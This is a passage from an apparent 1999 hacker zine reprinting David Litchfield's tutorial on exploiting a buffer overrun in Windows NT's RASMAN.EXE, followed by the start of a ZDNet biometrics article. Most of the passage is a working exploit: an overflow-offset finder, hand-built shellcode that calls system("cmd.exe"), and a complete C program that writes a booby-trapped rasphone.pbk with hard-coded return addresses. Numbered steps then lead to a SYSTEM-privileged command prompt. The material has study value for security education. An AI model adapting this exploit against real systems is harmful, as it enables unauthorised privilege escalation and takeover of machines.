Going back to our code, the fact that we have overwritten the return address, and so the EIP, means that we can effectively tell the CPU to go to a memory address of our choosing, pull down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 (41 is the hex value for a capital A). The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no readable memory there we get a thing known as an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at '0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242, essentially telling the processor to go to that memory address to get the next instruction, and more than likely we'd get the same Access Violation.

Exploiting a buffer overrun

As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to execute instructions or code of your choosing, getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer, which you load with your own opcodes, which are then executed. This raises the question, "Why would someone want to do this?"
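Before going on to the why, here are the mechanics of the 40-As case made concrete. This is an added example and not code from Litchfield's paper: it models the frame that gets(name) writes into as a plain byte array (32 bytes for name, then the saved EBP, then the saved return address that will be loaded into EIP), feeds it an unbounded copy that behaves like gets() and a bounded copy in the style of fgets(), and reports what the return address looks like afterwards. The frame layout, the little-endian byte order and the saved values 0x0012FF80 and 0x00401234 are assumptions of the model.

```c
/* Added example: a byte-array model of the stack frame that gets(name) overruns.
 * Assumed layout (32-bit x86, little-endian): name[32] | saved EBP | saved EIP. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_SIZE  32
#define FRAME_SIZE (NAME_SIZE + 4 + 4)

struct frame {
    uint8_t bytes[FRAME_SIZE];      /* name[32], saved EBP, saved return address */
};

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Fresh frame with recognisable saved values so any clobbering is visible. */
static void frame_init(struct frame *f, uint32_t saved_ebp, uint32_t saved_eip) {
    memset(f->bytes, 0, sizeof f->bytes);
    store_le32(f->bytes + NAME_SIZE, saved_ebp);
    store_le32(f->bytes + NAME_SIZE + 4, saved_eip);
}

static uint32_t frame_saved_ebp(const struct frame *f) { return load_le32(f->bytes + NAME_SIZE); }
static uint32_t frame_saved_eip(const struct frame *f) { return load_le32(f->bytes + NAME_SIZE + 4); }

/* What gets() does: copy up to newline/NUL and append a NUL, ignoring NAME_SIZE.
 * The copy is clipped at the end of the modelled frame only to keep this
 * simulation well defined; the real gets() has no limit at all. */
static size_t unbounded_read(struct frame *f, const char *input) {
    size_t n = 0;
    while (input[n] != '\0' && input[n] != '\n' && n < FRAME_SIZE) {
        f->bytes[n] = (uint8_t)input[n];
        n++;
    }
    if (n < FRAME_SIZE)
        f->bytes[n] = 0;
    return n;
}

/* The fix: a bounded read in the style of fgets(name, NAME_SIZE, stdin).
 * Never writes past name[NAME_SIZE - 1]; returns 1 if the input was truncated. */
static int bounded_read(struct frame *f, const char *input) {
    size_t n = 0;
    while (input[n] != '\0' && input[n] != '\n' && n < NAME_SIZE - 1) {
        f->bytes[n] = (uint8_t)input[n];
        n++;
    }
    f->bytes[n] = 0;
    return input[n] != '\0' && input[n] != '\n';
}

/* Feed n_chars capital As (constructed input) through either reader and
 * return the saved return address as it stands afterwards. */
static uint32_t eip_after_as(size_t n_chars, int use_bounded) {
    struct frame f;
    char input[64];
    if (n_chars > sizeof input - 1)
        n_chars = sizeof input - 1;
    memset(input, 'A', n_chars);
    input[n_chars] = 0;
    frame_init(&f, 0x0012FF80u, 0x00401234u);   /* assumed, illustrative saved values */
    if (use_bounded)
        bounded_read(&f, input);
    else
        unbounded_read(&f, input);
    return frame_saved_eip(&f);
}

int main(void) {
    struct frame f;
    frame_init(&f, 0x0012FF80u, 0x00401234u);
    unbounded_read(&f, "David");
    printf("gets, \"David\": EBP=0x%08X EIP=0x%08X\n", frame_saved_ebp(&f), frame_saved_eip(&f));
    printf("gets,  36 As : EIP=0x%08X (the terminating NUL landed in it)\n", eip_after_as(36, 0));
    printf("gets,  40 As : EIP=0x%08X\n", eip_after_as(40, 0));
    printf("fgets, 40 As : EIP=0x%08X (truncated, frame intact)\n", eip_after_as(40, 1));
    return 0;
}
```

The 36-As case is worth noting: even an input that only just spills past the saved EBP still corrupts the return address, because the terminating null byte is written too.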
Windows NT, like UNIX systems, requires a user to log into the system. Some users are very powerful, such as the Administrator, and others are just average, normal users that aren't as powerful. If a normal user wanted to become equivalent to the Administrator, and thus just as powerful, with almost full control of the system, they could exploit a buffer overrun to attain this. The problem is that the buffer overrun needs to be in a process that has enough power and privileges to be able to make them an Administrator, so there is no point in overrunning a process that they, the user themselves, have started. They need to overrun a process started by the system and then get the process to execute their own arbitrary code. The system account is very powerful, and if you can get a system process to do something, such as open a Command Prompt, then it will run with system privileges.

In Windows NT, if a process starts a new child process then the child process normally inherits the access token of the parent process. I say normally because some processes can be started using the Win32 CreateProcessAsUser ( ) function, which starts the new process under the security context of another user, so the new process has a different access token from the parent process. An Access Token is like a set of keys: it denotes a user's rights and privileges, which determine what they can and cannot do to the machine. An example of this is screen savers. The winlogon.exe system process is responsible for starting a user's screen saver. As opposed to running the screen saver in the security context of the system, winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user.

I digress - back to buffer overruns. In this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt.
This Command Prompt will have the access token of the system account, and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout.

A process embodies many things, amongst others a running program, one or more threads of execution, the process' virtual address space and the dynamic link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this, from address 0x00000000 to 0x7FFFFFFF, is private address space, where the program, its DLLs and its stack (or stacks, in the case of a multithreaded program) are found; the other half, from address 0x80000000 to 0xFFFFFFFF, is the system address space, where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed as of Service Pack 3: you can specify a switch in boot.ini, /3GB, that will assign 3 GB as private address space and 1 GB as system address space. This is to boost the performance of programs, such as databases, that require large amounts of memory.

When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the pages they use as read-only. Any attempt to modify pages in memory marked as read-only will cause an Access Violation. The first thread is started and a stack is initialised.

The Stack

What's the simplest way to describe a stack? Try this: imagine a carpenter. He has tools, materials and instructions. To be able to make something, though, he needs a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on the workbench, say two bits of wood waiting for the glue to dry, and do something else. When that task is complete he can come back to his two bits of wood and continue with that. The workbench is where most of the work is done.
So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as needed, as determined by the program's execution. When a programmatic task is started it'll place data on the stack, whether strings, memory addresses, integers or whatever, then manipulate them, and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the process interacts with the stack using a method known as Last In, First Out, or LIFO.

There are two registers that are crucial to the stack's functionality; they are used by the program to keep track of where data can be found in memory. These two registers are the ESP and the EBP.

The ESP, or Stack Pointer, points to the top of the stack: it contains the memory address where the top of the stack can be found. The ESP can be changed in a number of ways, both indirectly and directly. When something is PUSHed onto the stack the stack grows and the ESP moves accordingly; when something is POPed off the stack the stack shrinks and the ESP moves back. The PUSH and POP operations modify the ESP indirectly. But you can also manipulate the ESP directly, with say an instruction of "SUB esp,04h", which pushes the stack out by four bytes (one 32-bit dword, the size of a register). For those that haven't yet been numbed into boredom, something may just have irked: how is it that you SUBtract 4 from the ESP and yet the stack is pushed out? Well, this is because the stack works backwards. The bottom of the stack uses a memory address higher than the top of the stack:

    ----------------0x12121212  Top of the stack
    ...
    ...
    ----------------0x121212FF  Bottom of the stack

Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in gems like this to make that headache that bit more acute. When we say the stack increases in size, the address held in the ESP decreases.
Conversely, when the stack size decreases the address held in the ESP increases. Reaching for the Aspirin yet?

Our second stack related register is known as the EBP, or Base Pointer. The EBP holds the memory address of the bottom of the stack - more accurately, it points to a base point in the stack that we can use as a reference point within a given programmatic task. The EBP must have meaning to a given task, and to facilitate this, before the task's real business is started, a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is then copied into the EBP, thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during the task's execution.

Continuing with this, let's say an 11 character string (12 bytes with its null terminator) was placed onto the stack: our EBP remains the same but the ESP has been pushed out by 12 bytes. Then say an address was PUSHed onto the stack: our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we needed to reference the 11 byte string. We can do this by using our EBP: we know the first byte of our string is twelve bytes below the EBP, so we can reference the string by saying "the address EBP minus 12". (Remember the stack goes from a higher address to a lower address.)

RASMAN and buffer overruns

Finding the buffer overrun

The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own. In the case of RASMAN, the overrun was found by looking at the RAS functions and the structures they use.
Notice that some of the functions, such as RasGetDialParams ( ), fill structures that contain character arrays, much like the char name[31] character array in the C code above. By playing around with the rasphone.pbk file, the RAS Phone Book, where dialing details such as the phone number to be dialed are stored, you can root out these overruns. Make a phone book entry called "Internet" which dials into your ISP, dial it, and download your mail. This is important as it adds to the Registry an entry for the domain name of your mail server as an Autodial location. That is, if from that point on you try to contact your mail server without being dialed into the Internet, the Connection Manager kicks in and automatically dials for you. RASMAN is the process that handles this functionality.

Once you have done this, change the telephone number to a long string of As and then attempt to connect to your mail server, say by opening Outlook Express. This causes RASMAN to read from rasphone.pbk the telephone number to dial to be able to get to your mail server. But instead of the real telephone number the long string of As is read, and it fills a character array in the RAS_DIAL_PARAMS structure, which overflows, causing an Access Violation at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP.

Finding where the EIP is overwritten

By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296, 297, 298 and 299 of our string. (You'll find, if you are actually following this, that you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow and msimn.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger; the debugging capabilities of Visual C++ are very good. Attach to the RASMAN process and then get it to dial, or attempt to at least. Wait for the access violation.
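Varying the length of the string until the right four bytes land in EIP works, but a cyclic pattern turns the search into a single crash. As an added example that is not part of Litchfield's paper, the following block implements in C the idea behind Metasploit's pattern_create and pattern_offset tools: a 400-byte pattern is assumed to be put in rasphone.pbk as the "telephone number", and the value the debugger then shows in EIP is mapped straight back to its offset in the string. For an overwrite at bytes 296 to 299, as the paper found, that value would be 0x396A4138.

```c
/* Added example: cyclic-pattern helper for locating which bytes of an
 * overlong input land in EIP. Not part of Litchfield's paper. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Writes the pattern "Aa0Aa1Aa2...Aa9Ab0..." into out (len bytes plus a NUL,
 * so out must hold len + 1). Every 4-byte window is unique within the first
 * 20280 bytes, so four consecutive bytes identify their own position. */
static size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                if (n < len) out[n++] = u;
                if (n < len) out[n++] = l;
                if (n < len) out[n++] = d;
            }
    out[n] = 0;
    return n;
}

/* Given the value the debugger shows in EIP after the access violation,
 * return the offset of those four bytes within the pattern, or -1 if the
 * value did not come from the pattern at all (e.g. 0x41414141).
 * x86 is little-endian, so the lowest byte of EIP is the first byte. */
static long pattern_offset(const char *pat, size_t len, uint32_t eip) {
    uint8_t needle[4] = { eip & 0xff, (eip >> 8) & 0xff, (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Read four pattern bytes as the register value they would produce. */
static uint32_t le32_at(const char *p) {
    return (uint32_t)(uint8_t)p[0] | ((uint32_t)(uint8_t)p[1] << 8) |
           ((uint32_t)(uint8_t)p[2] << 16) | ((uint32_t)(uint8_t)p[3] << 24);
}

/* The EIP value a crash would show if bytes offset..offset+3 of a 400-byte
 * pattern were the ones that overwrote the return address. */
static uint32_t eip_value_for_offset(size_t offset) {
    char pat[401];
    pattern_create(pat, 400);
    return le32_at(pat + offset);
}

/* Map a crash EIP back to its offset in the 400-byte pattern. */
static long locate_in_400(uint32_t eip) {
    char pat[401];
    pattern_create(pat, 400);
    return pattern_offset(pat, 400, eip);
}

int main(void) {
    char pat[401];
    pattern_create(pat, 400);
    uint32_t crash_eip = eip_value_for_offset(296);   /* what the paper's case would show */
    printf("pattern starts: %.24s...\n", pat);
    printf("EIP seen in debugger: 0x%08X -> offset %ld\n", crash_eip, locate_in_400(crash_eip));
    printf("0x41414141 -> offset %ld (not from the pattern)\n", locate_in_400(0x41414141u));
    return 0;
}
```

The same pattern also reveals where the overwritten EBP came from, which the paper uses later: read the EBP value from the debugger and pass it to the same lookup.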
Analyze what's going on

Once the access violation has occurred we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP, which will come in handy later on, and that the address of the first A of our "telephone number" is 0x015DF105. By getting RASMAN to access violate a number of times we find that the first A is always written to this address. That check matters: the exploit hard-codes this address, so it only works if the string really does land in the same place every time. This is the address we're going to set the EIP to, so that the processor will look at that address for the next instruction to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitrary code.

We then need to ask, "What do we want it to do?"

Where do you want to go today? - What do you want to achieve?

The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter, is to use the system ( ) function. When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT, and executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing. If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe, so we are running two instances of the command interpreter; however the second one won't exit until we tell it to (and nor will the first until the second one has exited).

Rather than placing the opcodes that actually form the system ( ) function in our exploit string, it would be easier to simply call it.
When you call a function you tell the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size: rather than each program containing the necessary code for each function used, they can call a shared DLL that does contain the code. DLLs are said to export functions, that is, the DLL provides an address where a function can be found. The DLL also has a preferred base address so the system knows where to load it. When a DLL is loaded into a process' address space it will be found at that base address, unless that range is already occupied and the loader has to relocate it, and the functions it exports can then be found at an entry point offset from the base.

The system ( ) function is exported by msvcrt.dll (the Microsoft Visual C++ Runtime library), which has a base address of 0x78000000, and the system ( ) entry point can be found at offset 000208C3 (in version 5.00.7303 of msvcrt.dll, anyway), meaning that the address of the system ( ) function is 0x780208C3. Note that this offset belongs to that version of the DLL: a different build of msvcrt.dll will have system ( ) at a different address, so check the version on the target. Hopefully msvcrt.dll will already be loaded into RASMAN's address space; if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed: we'll simply build a stack with our string of the command to run (cmd.exe) and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. Nulls can really complicate issues, because the "telephone number" is read in as a string and a null byte would end it early.

To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our arbitrary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and link it with kernel32.lib, then run and debug it.
    #include <windows.h>
    #include <stdio.h>

    typedef void (*MYPROC)(LPTSTR);

    int main()
    {
        HINSTANCE LibHandle;
        MYPROC ProcAdd;
        char dllbuf[11] = "msvcrt.dll";
        char sysbuf[7] = "system";
        char cmdbuf[8] = "cmd.exe";

        /* load msvcrt.dll, look up system() and call it with "cmd.exe" */
        LibHandle = LoadLibrary(dllbuf);
        ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf);
        (ProcAdd) (cmdbuf);
        return 0;
    }

On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that, starting from the top of the stack, we find the address of the "c" of cmd.exe, then the address of where the system ( ) function can be found, the null terminated cmd.exe string and a few other things that are not too important. So to emulate this we need the null terminated "cmd.exe" string in the stack, then the address of the system function and then the address which points to our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( ):

    ESP (Top of the Stack)
    --------------------
    XX
    --------------------
    XX
    --------------------
    XX
    --------------------
    XX
    --------------------
    C3
    --------------------
    08
    --------------------
    02
    --------------------
    78
    --------------------
    63   c
    --------------------
    6D   m
    --------------------
    64   d
    --------------------
    2E   .
    --------------------
    65   e
    --------------------
    78   x
    --------------------
    65   e
    --------------------
    00
    --------------------
    EBP (Bottom of the stack)

where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference point.

Writing the Assembly.

This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in our exploit string because, as you can see, there are nulls in it and we can't have nulls.
Because we have to build it, this is where knowing at least a little assembly language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.) To do this we use:

    mov esp, ebp

This moves the EBP into the ESP - remember we overwrite the EBP as well as the EIP, which is really handy. We'll overwrite the EBP with an address we know we can write to - we will use 0x015DF124. Consequently, after we move the EBP into the ESP, the top of the stack will be found at 0x015DF124. We then want to push EBP onto the stack. This is our return address.

    push ebp

This has the effect of pushing the ESP down 4 bytes and so ESP is now 0x015DF120. After this we then want to move the ESP into the EBP:

    mov ebp,esp

This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look.

The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. Even though the cmd.exe string isn't there yet, it will be, but we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do this by xoring a register with itself - we'll use the EDI register.

    xor edi,edi

This will set the EDI to 00000000 and then we push it onto the stack using

    push edi

This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far, and don't forget we need a null tacked on the end of our string, so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We could push the edi again, but for variety we'll just sub the ESP by 4.

    sub esp,04h

Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack.
To do this we'll use the EBP as a reference point and move 63, the hex value for a small "c", into the address offset from the EBP minus 8.

    mov byte ptr [ebp-08h],63h

We do the same for the "m", the "d", the ".", the first "e", the "x" and the final "e".

    mov byte ptr [ebp-07h],6Dh
    mov byte ptr [ebp-06h],64h
    mov byte ptr [ebp-05h],2Eh
    mov byte ptr [ebp-04h],65h
    mov byte ptr [ebp-03h],78h
    mov byte ptr [ebp-02h],65h

Our stack now looks like this:

    ESP
    -----------------------------------------------------
    63   c
    -----------------------------------------------------
    6D   m
    -----------------------------------------------------
    64   d
    -----------------------------------------------------
    2E   .
    -----------------------------------------------------
    65   e
    -----------------------------------------------------
    78   x
    -----------------------------------------------------
    65   e
    -----------------------------------------------------
    00
    -----------------------------------------------------
    EBP

All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system ( ) function. We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack:

    mov eax, 0x780208C3
    push eax

We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load the address 8 bytes less than the EBP into a register:

    lea eax,[ebp-08h]

The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack:

    push eax

With this done our stack is built and we are ready to call system ( ), but we don't call it directly - again we use the indirection of using our EBP as a reference point and call the address found at EBP minus 12 (or 0C in hex):

    call dword ptr [ebp-0ch]

Here is all our code strung together.
    mov esp,ebp
    push ebp
    mov ebp,esp
    xor edi,edi
    push edi
    sub esp,04h
    mov byte ptr [ebp-08h],63h
    mov byte ptr [ebp-07h],6Dh
    mov byte ptr [ebp-06h],64h
    mov byte ptr [ebp-05h],2Eh
    mov byte ptr [ebp-04h],65h
    mov byte ptr [ebp-03h],78h
    mov byte ptr [ebp-02h],65h
    mov eax, 0x780208C3
    push eax
    lea eax,[ebp-08h]
    push eax
    call dword ptr [ebp-0ch]

The next thing to do is test this assembly to see if it works, so we need to write a program that uses the __asm keyword. The __asm keyword takes Assembly language and incorporates it into a C program. As we are calling system ( ), which is exported by msvcrt.dll, we'll need to load that - we use the LoadLibrary ( ) function to do this - otherwise when run our code would fail:

    #include <windows.h>
    #include <stdio.h>

    int main()
    {
        /* make sure msvcrt.dll, and so system(), is in our address space */
        LoadLibrary("msvcrt.dll");
        __asm
        {
            mov esp,ebp
            push ebp
            mov ebp,esp
            xor edi,edi
            push edi
            sub esp,04h
            mov byte ptr [ebp-08h],63h
            mov byte ptr [ebp-07h],6Dh
            mov byte ptr [ebp-06h],64h
            mov byte ptr [ebp-05h],2Eh
            mov byte ptr [ebp-04h],65h
            mov byte ptr [ebp-03h],78h
            mov byte ptr [ebp-02h],65h
            mov eax, 0x780208C3
            push eax
            lea eax,[ebp-08h]
            push eax
            call dword ptr [ebp-0ch]
        }
        return 0;
    }

Compile and link with kernel32.lib. When run this should start a new instance of the Command Interpreter, cmd.exe. There will be an access violation when you exit that instance, though - we've messed around with the stack and haven't cleaned up after ourselves. That's it then - that's our arbitrary code and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that though, we need to get the opcodes for the above assembly. This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push ebp" etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad.
The easiest thing to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitrary code. Below is an example of such a program with comments:

    /* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in   */
    /* RASMAN.EXE - it will drop the user into a Command Prompt started by the system.             */
    /* It operates by re-writing the EIP and pointing it back into our exploit string which calls */
    /* the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on     */
    /* NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[78] to          */
    /* buffer[81] in this code to suit your version. msvcrt.dll is already loaded in memory - it  */
    /* is used by RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk )            */

    #include <windows.h>
    #include <stdio.h>

    int main (int argc, char *argv[])
    {
        FILE *fd;
        int count=0;
        char buffer[1024];

        /* Make room for our stack so we are not overwriting anything we haven't */
        /* already overwritten. Fill this space with nops */
        while (count < 37)
        {
            buffer[count]=0x90;
            count ++;
        }

        /* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */
        /* We build our own little stack here */

        /* mov esp,ebp */
        buffer[37]=0x8B; buffer[38]=0xE5;

        /* push ebp */
        buffer[39]=0x55;

        /* mov ebp,esp */
        buffer[40]=0x8B; buffer[41]=0xEC;

        /* This completes our prologue */

        /* We need some nulls */
        /* xor edi,edi */
        buffer[42]=0x33; buffer[43]=0xFF;

        /* Now we begin placing stuff on our stack */
        /* Ignore this NOP */
        buffer[44]=0x90;

        /* push edi */
        buffer[45]=0x57;

        /* sub esp,4 */
        buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04;

        /* When the system() function is called you ask it to start a program or command       */
        /* eg system("dir c:\\"); would give you a directory listing of the c drive             */
        /* The system () function spawns whatever is defined as the COMSPEC environment        */
        /* variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in     */
        /* other words after running the command the cmd.exe process will exit. However, running */
        /* system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn   */
        /* another command prompt - one which won't go away on us. This is what we're going to  */
        /* do here                                                                               */

        /* write c of cmd.exe to (EBP - 8) which happens to be the ESP */
        /* mov byte ptr [ebp-08h],63h */
        buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8; buffer[52]=0x63;

        /* write the m to (EBP-7) */
        /* mov byte ptr [ebp-07h],6Dh */
        buffer[53]=0xC6; buffer[54]=0x45; buffer[55]=0xF9; buffer[56]=0x6D;

        /* write the d to (EBP-6) */
        /* mov byte ptr [ebp-06h],64h */
        buffer[57]=0xC6; buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64;

        /* write the . to (EBP-5) */
        /* mov byte ptr [ebp-05h],2Eh */
        buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB; buffer[64]=0x2E;

        /* write the first e to (EBP-4) */
        /* mov byte ptr [ebp-04h],65h */
        buffer[65]=0xC6; buffer[66]=0x45; buffer[67]=0xFC; buffer[68]=0x65;

        /* write the x to (EBP-3) */
        /* mov byte ptr [ebp-03h],78h */
        buffer[69]=0xC6; buffer[70]=0x45; buffer[71]=0xFD; buffer[72]=0x78;

        /* write the second e to (EBP-2) */
        /* mov byte ptr [ebp-02h],65h */
        buffer[73]=0xC6; buffer[74]=0x45; buffer[75]=0xFE; buffer[76]=0x65;

        /* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3 */
        /* Use QuickView to get the entry point for system() if you have a different  */
        /* version of msvcrt.dll and change these bytes accordingly                   */
        /* mov eax, 0x780208C3 */
        buffer[77]=0xB8; buffer[78]=0xC3; buffer[79]=0x08; buffer[80]=0x02; buffer[81]=0x78;

        /* Push this onto the stack */
        /* push eax */
        buffer[82]=0x50;

        /* now we load the address of our pointer to the cmd.exe string into EAX */
        /* lea eax,[ebp-08h] */
        buffer[83]=0x8D; buffer[84]=0x45; buffer[85]=0xF8;

        /* and then push it onto the stack */
        /* push eax */
        buffer[86]=0x50;

        /* now we call our system () function - all going well a command prompt will */
        /* be started, the parent process being rasman.exe                           */
        /* call dword ptr [ebp-0Ch] */
        buffer[87]=0xFF; buffer[88]=0x55; buffer[89]=0xF4;

        /* fill to our EBP with nops */
        count = 90;
        while (count < 291)
        {
            buffer[count]=0x90;
            count ++;
        }

        /* Re-write EBP */
        buffer[291]=0x24; buffer[292]=0xF1; buffer[293]=0x5D; buffer[294]=0x01;

        /* Re-write EIP */
        buffer[295]=0x26; buffer[296]=0xF1; buffer[297]=0x5D; buffer[298]=0x01;
        buffer[299]=0x00; buffer[300]=0x00;

        /* Print on the screen our exploit string */
        printf("%s", buffer);

        /* Open and create a file called rasphone.pbk */
        fd = fopen("rasphone.pbk", "w");
        if(fd == NULL)
        {
            printf("Operation failed\n");
            return 0;
        }
        else
        {
            fprintf(fd,"[Internet]\n");
            fprintf(fd,"Phone Number=");
            fprintf(fd,"%s",buffer);
            fprintf(fd,"\n");
            fclose(fd);
        }
        return 0;
    }

When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitrary code. When RASMAN.EXE opens this file it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure which contains the character arrays. As you'll have guessed, we're overflowing the one that holds the telephone number.

Now to test it all. Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3, all running on a Pentium processor, and it works - that's not to say that it will run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So anyway, let's test it. To be able to get this to work take the following steps:

1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give Everyone the Change permission so there shouldn't be a problem with this.

2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty; click OK to create a new one.

3) Click OK and make a new entry, calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete, dial it.

4) Once connected, open Outlook Express and download your e-mail. The reason for doing this is that it will create a Registry entry for your mail server's domain name and associate it as an autodialable address. If Outlook Express' connection is dial-up, change it to a LAN connection - this'll be under the mail account's properties.

5) Hang up and close Outlook Express.

6) Delete the new rasphone.pbk and replace it with the one made by the above code.

7) Open Outlook Express.
Because you're not connected to the Internet, RASMAN should automatically dial for you, read the autodial information from the Registry, then open rasphone.pbk, fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges. That's it - we've exploited a buffer overrun and executed our arbitrary code.

@HWA

55.0 More on biometrics
~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

ZDNET ON BIOMETRICS
by BHZ, Thursday 20th May 1999 on 10.15 pm CET

Biometric security is well established now. Quick note: this is the branch of computer security where you don't need passwords but can be recognized by your thumb, eye or voice. ZDNet published an article about current biometric products, prices and standards. Read the article below.

http://www.zdnet.com/anchordesk/story/story_3395.html?chkpt=ad1qsfp

Berst Alert
WEDNESDAY, MAY 19, 1999

The Biometrics Revolution
Jesse Berst, Editorial Director
ZDNet AnchorDesk

Our ever-frugal Tech Director Jon DeKeles strolled into the office the other day and offered to buy everyone lunch. After I picked myself up off the floor, I demanded to see his ID. Some alien creature had obviously taken control of his body -- lab coat and all.

If AnchorDesk had the latest biometric technology, I wouldn't ask for ID. I'd have voice-authentication software to compare Jon's voice against an earlier voice-capture. Or I'd put him in front of a camera lens to scan his iris and match it against iris codes in the database.

